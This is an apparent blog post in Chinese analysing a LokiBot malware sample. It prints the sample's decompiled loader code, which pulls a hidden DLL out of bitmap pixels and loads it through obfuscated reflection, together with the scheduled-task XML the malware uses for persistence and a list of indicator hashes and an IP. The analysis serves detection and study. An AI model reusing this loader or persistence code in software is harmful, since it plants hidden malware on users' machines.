LokiBot
LokiBot#
https://0xmrmagnezi.github.io/malware analysis/LokiBot/
Sample#
bfd4e29505627b76243c4ea34c07b22af7edc00391b112e78c2dc3cf7a48d742
File Info#
Die
Capa
.Net样本,dnspy打开后,是图形界面的框架内包含恶意代码,在main处跟踪StartMenu类的初始化
在InitializeComponent内,加载了资源并进行线程创建执行
Thread.Sleep(7021);
Bitmap bm = Resources.Viral;
List<byte> data = new List<byte>();
int maxDataLength = 74752;
StartMenu.F4(bm, data, maxDataLength);
Assembly Wr_99 = Interaction.CallByName(Thread.GetDomain(), "L" + "O".ToLower() + "ad", CallType.Get, new object[] { data.ToArray() }) as Assembly;
Type[] exportedTypes = Interaction.CallByName(Wr_99, "GetExportedTypes", CallType.Method, new object[0]) as Type[];
Type airo = ((exportedTypes != null) ? exportedTypes[0] : null);
this.Game_Config = airo;
资源Viral
通过F4启动解密加载
// Token: 0x06000017 RID: 23 RVA: 0x00003964 File Offset: 0x00001B64
private static Color F1(Bitmap img, int p1, int p2)
{
return img.GetPixel(p1, p2);
}
// Token: 0x06000018 RID: 24 RVA: 0x00003980 File Offset: 0x00001B80
private static int F3(Bitmap img)
{
return img.Height;
}
// Token: 0x06000019 RID: 25 RVA: 0x00003998 File Offset: 0x00001B98
private static void F4(Bitmap src, List<byte> b, int l)
{
int x = 0;
while (x < src.Width && b.Count < l)
{
int y = 0;
while (y < StartMenu.F3(src) && b.Count < l)
{
StartMenu.F6(src, b, x, y, l);
y++;
}
x++;
}
}
// Token: 0x0600001A RID: 26 RVA: 0x000039F8 File Offset: 0x00001BF8
private static void F6(Bitmap src, List<byte> b, int x, int y, int l)
{
Color c = StartMenu.F1(src, x, y);
int r = l - b.Count;
bool flag = r >= 3;
if (flag)
{
int v = ((int)c.R << 16) | ((int)c.G << 8) | (int)c.B;
b.Add((byte)((v >> 16) & 255));
b.Add((byte)((v >> 8) & 255));
b.Add((byte)(v & 255));
}
else
{
bool flag2 = r > 0;
if (flag2)
{
b.AddRange(new byte[] { c.R, c.G, c.B }.Take(r));
}
}
}
解密出的dll
debug看到dll的调用方法被赋值给Game_Config
通过传递后, Activator.CreateInstance(t, args) 进行调用
查看dll,有混淆
大致梳理,在 GtaAIbrHXObmMm8GPA 实例化,rq3bbHQEOKkdNrd09q.UMJYQAT7H 静态对象被创建时,构造函数 rq3bbHQEOKkdNrd09q 被调用,构造函数执行了函数 kAOj1Y7pfP90kycNNw.rG10IIjS4v
函数 kAOj1Y7pfP90kycNNw.rG10IIjS4v 通过加载资源内的数据进行计算解密
解密后组装成为dictionary字典赋值给kAOj1Y7pfP90kycNNw.nJ10XRHxa0,通过metadatatoken进行对比,进行GetMethod,再执行
kAOj1Y7pfP90kycNNw.nJ10XRHxa0 Count = 0x0000001D
[0] [0x04000075, 0x0600012A] System.Void NNNcIlaVTTHGM2DpRs.xHQmOOmpH6pHg4ZbSt::.cctor() /null
[1] [0x0400007A, 0x06000009] System.Void jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::FZaOOUuPv() /
[2] [0x0400007D, 0x06000002] System.String jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::lEA0fIAr0() /
[3] [0x0400007E, 0x06000005] System.String jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::DGw7NTeNK()
[4] [0x0400007F, 0x06000003] System.String jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::tZCA8AZk9() /Assembly.GetExecutingAssembly.GetName().Version.ToString()
[5] [0x04000080, 0x06000006] System.String jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::Om2dkTqQy()
[6] [0x04000081, 0x06000007] System.String jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::EZYgaiyMO()
[7] [0x04000082, 0x06000004] System.String jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::gXO9bmMm8()
[8] [0x04000083, 0x06000042] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::ssEGrke6D(System.String,System.String,System.String)
[9] [0x0400007B, 0x06000056] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::L6gRZVYre()
[10] [0x0400007C, 0x0600003C] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::pdRTRvDsW()
[11] [0x04000076, 0x0600004D] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::GpxPFEvNk() /计算
[12] [0x04000077, 0x06000043] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::Qcnk8Ab6R() /Sleep
[13] [0x04000084, 0x06000044] System.String AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::bnx5YM4I6(System.String)
[14] [0x04000078, 0x0600004C] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::Be1Mnc7Lx() /计算
[15] [0x04000085, 0x06000045] System.String AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::hfaUyPoVp(System.String)
[16] [0x04000087, 0x06000046] System.Drawing.Bitmap AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::LBT40X0ux(System.String,System.String)
[17] [0x04000089, 0x06000047] System.Byte[] AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::Dn3o570qq(System.Drawing.Bitmap)
[18] [0x0400008B, 0x06000048] System.Byte[] AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::zN0hl0lZA(System.Byte[],System.String)
[19] [0x0400008D, 0x06000049] System.Reflection.Assembly AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::I8LyUPIvs(System.Byte[])
[20] [0x0400008F, 0x0600004A] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::DsWEUoEhQ(System.Reflection.Assembly)
[21] [0x04000079, 0x0600004B] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::fEPLYkh7f() /Exit
[22] [0x04000086, 0x06000051] System.String AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::Gto2NNcIl(System.String) /return string
[23] [0x04000088, 0x06000052] System.Drawing.Bitmap AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::yTTKHGM2D(System.String,System.String) /arg2.Properties.ResourcesGetObject(arg1)
[24] [0x04000090, 0x06000054] System.Drawing.Bitmap AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::vKfv2nutI(System.Drawing.Bitmap,System.Int32,System.Int32) /return bitmap
[25] [0x0400008A, 0x06000053] System.Byte[] AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::HRsFAQSdu(System.Drawing.Bitmap) /FromBitmapTobytes
[26] [0x0400008C, 0x06000050] System.Byte[] AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::g6pbHg4Zb(System.Byte[],System.String) /Bytearry 计算
[27] [0x0400008E, 0x0600004F] System.Reflection.Assembly AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::vaH8QmOOp(System.Byte[]) /Assembly.Load
[28] [0x04000091, 0x0600004E] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::aoLWTBjh6(System.Object) /GetType GetMethod Invoke
执行流程是
12A 4D 43 4C 4B 42 44 45 51 46 52 47 53 54 48 50 49 4F 4A 4E
42 停留长,进入观察,发现了对于exe文件另一个资源的导入
获取第二个dll
期间还有与上方介绍,生成Montero
0x49 ILyUPlvs 内 ,为引入的第三个dll
759行的实例化调用跟入,得到第二个dll(Montero.dll)执行的方法
u5wyJlCJdlexnQOvPm.CttdtNZs0aZFMns15c::pHmoBIlQfq()被Invoke执行
CttdtNZs0aZFMns15c 构造函数,初始化一些字符串和一堆系统函数指针
会检查text3是否存在,不存在的话进行创建
复制本体,编辑文件权限
从Base64解码,保存xml临时文件用于创建计划任务,实现持久化
xml文件
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2014-10-25T14:27:44.8929027</Date>
<Author>[USERID]</Author>
</RegistrationInfo>
<Triggers>
<LogonTrigger>
<Enabled>true</Enabled>
<UserId>[USERID]</UserId>
</LogonTrigger>
<RegistrationTrigger>
<Enabled>false</Enabled>
</RegistrationTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<UserId>[USERID]</UserId>
<LogonType>InteractiveToken</LogonType>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>[LOCATION]</Command>
</Exec>
</Actions>
</Task>
第三个exe文件
加载后进行解密
程序被存在CttdtNZs0aZFMns15c.f0uAOgkXtG,在下方被CttdtNZs0aZFMns15c.vyhodOMfxv(); 或者 cEHolDw2UC()调用
这里启动线程的功能,但是没有被触发
文件已经下载不到
https://www.virustotal.com/gui/file/825eb1a627f34c3d1fad85cb5904b5ac0fded65f677c5a85fa992e42c450fd99/community
总结#
整体调用可能因为混淆和线程,子调用,加载等关系,认为比较复杂,涉及的主要功能均是可以追溯,但复杂的逻辑判断嵌套影响分析较为严重,手法包含delegete call invoke metadatatoken 线程,加解密计算,上传下载,目前先分析到这里
IOC#
d32a2695564662ad43686cb1e4878e3ec2dc3568
3b80a914b55f0dff916239ed4e8a878d3e34dbcd
ca8cf362bd477b163fa52d0ddc614923f8034880
2753a159f2cf160733b1ceeede1db57d2dde0375
87b9de16b8eee1d4afb1e202b277b7abac3fc3d2
94.156.177.41
Read other posts